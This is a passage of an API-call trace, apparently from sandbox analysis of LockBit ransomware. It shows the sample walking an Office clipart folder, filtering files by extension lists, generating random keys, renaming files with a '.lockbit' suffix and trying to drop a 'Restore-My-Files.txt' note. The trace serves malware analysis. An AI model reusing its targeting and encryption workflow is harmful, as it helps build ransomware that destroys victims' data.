[0138.790] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105376.WMF") returned 1 [0138.790] lstrcmpiW (lpString1="ntldr", lpString2="J0105376.WMF") returned 1 [0138.790] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105376.WMF") returned 1 [0138.790] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105376.WMF") returned -1 [0138.790] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105376.WMF") returned -1 [0138.790] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105376.WMF") returned 1 [0138.790] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105376.WMF") returned -1 [0138.790] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.790] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned=".WMF" [0138.790] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.791] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.791] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.792] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF.lockbit") returned 72 [0138.792] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105376.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0138.792] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.792] malloc (_Size=0x40068) returned 0x1ff1e60 [0138.792] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4964) returned 1 [0138.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0138.793] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0138.793] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.797] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.797] malloc (_Size=0xa6) returned 0x77d7a8 [0138.797] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.797] free (_Block=0x77d7a8) [0138.797] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.798] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.798] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.798] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1364, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105378.WMF", cAlternateFileName="")) returned 1 [0138.798] lstrcmpiW (lpString1=".", lpString2="J0105378.WMF") returned -1 [0138.798] lstrcmpiW (lpString1="..", lpString2="J0105378.WMF") returned -1 [0138.798] PathFindExtensionW (pszPath="J0105378.WMF") returned=".WMF" [0138.798] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.798] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.799] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.799] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105378.WMF") returned 1 [0138.800] lstrcmpiW (lpString1="ntldr", lpString2="J0105378.WMF") returned 1 [0138.800] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105378.WMF") returned 1 [0138.800] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105378.WMF") returned -1 [0138.800] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105378.WMF") returned -1 [0138.800] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105378.WMF") returned 1 [0138.800] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105378.WMF") returned -1 [0138.800] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.800] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned=".WMF" [0138.800] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.800] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.800] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.801] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.801] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF.lockbit") returned 72 [0138.801] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105378.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0138.802] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.802] malloc (_Size=0x40068) returned 0x3d70450 [0138.802] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4964) returned 1 [0138.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.802] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0138.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0138.803] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.807] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.807] malloc (_Size=0xa6) returned 0x77d7a8 [0138.807] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.808] free (_Block=0x77d7a8) [0138.808] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.808] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.808] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.808] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1210, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105380.WMF", cAlternateFileName="")) returned 1 [0138.808] lstrcmpiW (lpString1=".", lpString2="J0105380.WMF") returned -1 [0138.808] lstrcmpiW (lpString1="..", lpString2="J0105380.WMF") returned -1 [0138.808] PathFindExtensionW (pszPath="J0105380.WMF") returned=".WMF" [0138.808] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.808] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.808] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.808] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.808] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.809] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.810] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.810] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.811] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105380.WMF") returned 1 [0138.811] lstrcmpiW (lpString1="ntldr", lpString2="J0105380.WMF") returned 1 [0138.811] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105380.WMF") returned 1 [0138.811] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105380.WMF") returned -1 [0138.811] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105380.WMF") returned -1 [0138.811] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105380.WMF") returned 1 [0138.811] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105380.WMF") returned -1 [0138.811] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.811] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF") returned=".WMF" [0138.811] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.811] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.811] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.811] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.811] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.811] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.811] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.811] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.811] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.811] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.811] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.812] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.812] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF.lockbit") returned 72 [0138.812] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105380.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0138.813] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.813] malloc (_Size=0x40068) returned 0x3e70008 [0138.813] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4624) returned 1 [0138.813] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.814] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0138.814] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.814] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0138.814] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0138.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.818] malloc (_Size=0xa6) returned 0x77d7a8 [0138.818] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.819] free (_Block=0x77d7a8) [0138.819] PathRemoveFileSpecW (in: 